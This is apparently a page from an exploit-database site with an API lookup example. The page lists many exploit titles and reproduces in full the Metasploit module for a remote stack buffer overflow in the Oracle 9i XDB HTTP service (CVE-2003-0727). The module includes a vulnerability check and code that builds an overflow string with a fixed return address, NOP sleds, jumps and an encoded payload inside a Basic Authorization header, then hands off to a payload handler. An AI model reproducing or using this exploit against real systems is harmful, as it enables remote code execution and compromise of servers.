Menu

Improved exploit search engine. Try it out

"Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)"

Author

Metasploit

Platform

windows_x86

Release date

2010-09-20

Release Date Title Type Platform Author
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-01-02 "Ayukov NFTP FTP Client 2.0 - Buffer Overflow" local windows_x86 "Uday Mittal"
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-20 "LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)" local windows_x86 bzyo
2018-12-09 "Textpad 8.1.2 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-11-26 "Arm Whois 3.11 - Buffer Overflow (ASLR)" local windows_x86 zephyr
2018-11-19 "HTML Video Player 1.2.5 - Buffer-Overflow (SEH)" local windows_x86 "Kağan Çapar"
2018-11-06 "Arm Whois 3.11 - Buffer Overflow (SEH)" local windows_x86 "Semen Alexandrovich Lyhin"
2018-08-29 "Argus Surveillance DVR 4.0.0.0 - Directory Traversal" webapps windows_x86 hyp3rlinx
2010-09-27 "Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting" webapps windows_x86 **RoAd_KiLlEr**
2010-09-24 "Traidnt UP - Cross-Site Request Forgery (Add Admin)" webapps windows_x86 "John Johnz"
2010-09-24 "Joomla! Component Elite Experts - SQL Injection" webapps windows_x86 **RoAd_KiLlEr**
2010-08-12 "PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion" webapps windows_x86 LoSt.HaCkEr
2018-08-20 "SEIG Modbus 3.4 - Remote Code Execution" remote windows_x86 "Alejandro Parodi"
2018-08-19 "SEIG SCADA System 9 - Remote Code Execution" remote windows_x86 "Alejandro Parodi"
2017-10-17 "Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)" remote windows_x86 mschenk
2016-04-25 "PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow (Metasploit)" remote windows_x86 "Jonathan Smith"
2015-11-02 "Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution" remote windows_x86 "Tomislav Paskalev"
2015-08-18 "Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)" remote windows_x86 Metasploit
2010-09-20 "CA CAM (Windows x86) - 'log_security()' Remote Stack Buffer Overflow (Metasploit)" remote windows_x86 Metasploit
2010-09-20 "Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)" remote windows_x86 Metasploit
2010-09-20 "PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)" remote windows_x86 Metasploit
2010-09-20 "McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit)" remote windows_x86 Metasploit
2010-07-07 "Apache (Windows x86) - Chunked Encoding (Metasploit)" remote windows_x86 Metasploit
2010-04-30 "Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)" remote windows_x86 Metasploit
Release Date Title Type Platform Author
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-05 "IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-04-30 "Pimcore < 5.71 - Unserialize RCE (Metasploit)" remote php Metasploit
2019-04-30 "AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)" remote windows Metasploit
2019-04-25 "RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)" local windows Metasploit
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-03-28 "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)" remote multiple Metasploit
2019-03-28 "CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)" remote php Metasploit
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/16809/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/16809/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/16809/12223/oracle-9i-xdb-windows-x86-http-pass-overflow-metasploit/download/", "exploit_id": "16809", "exploit_description": "\"Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)\"", "exploit_date": "2010-09-20", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "windows_x86", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the authorization
				code of the Oracle 9i HTTP XDB service. David Litchfield,
				has illustrated multiple vulnerabilities in the Oracle
				9i XML Database (XDB), during a seminar on "Variations
				in exploit methods between Linux and Windows" presented
				at the Blackhat conference.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2003-0727'],
					['OSVDB', '2449'],
					['BID', '8375'],
					['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 18 2003'))

		register_options(
			[
				Opt::RPORT(8080)
			], self.class )
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect

		if (resp =~ /9.2.0.1.0/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit =  rand_text_english(4, payload_badchars) + ":"
		sploit << rand_text_english(442, payload_badchars)
		sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
		sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded

		req  = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"

		res  = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req

		print_status("Trying target %s..." % target.name)

		sock.put(res)

		handler
		disconnect
	end

end